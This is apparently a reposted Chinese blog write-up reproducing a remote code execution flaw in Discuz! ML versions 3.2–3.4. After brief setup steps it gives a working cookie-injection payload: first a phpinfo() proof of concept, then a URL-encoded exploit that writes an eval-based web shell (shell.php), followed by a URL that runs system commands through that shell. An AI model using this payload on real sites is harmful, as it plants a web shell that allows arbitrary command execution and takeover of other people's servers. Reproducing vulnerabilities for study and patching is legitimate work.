Discuz! ML RCE漏洞 getshell 復現


0x01 影響版本

Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

 

0x02 環境搭建

直接官網下載即可http://discuz.ml/download

將壓縮包解壓至phpstudy網站根目錄,瀏覽器訪問upload目錄即可開始安裝

之后就是傻瓜式操作,一直點擊下一步就可以了,直到完成安裝

 

0x03 漏洞Poc

隨便點擊一個,抓包

將Cookie中的xxxxx_language參數值改為 '.phpinfo().' ,可以看到成功執行了代碼

 

0x04 Getshell

EXP:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

本地就多了一個shell.php文件

訪問http://127.0.0.1/discuzml/upload/shell.php?cmd=system('whoami');即可看到成功執行了命令

 

參考文章:

 https://mp.weixin.qq.com/s/B5K9gr7Hhu7PlHk_H5WK2g


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM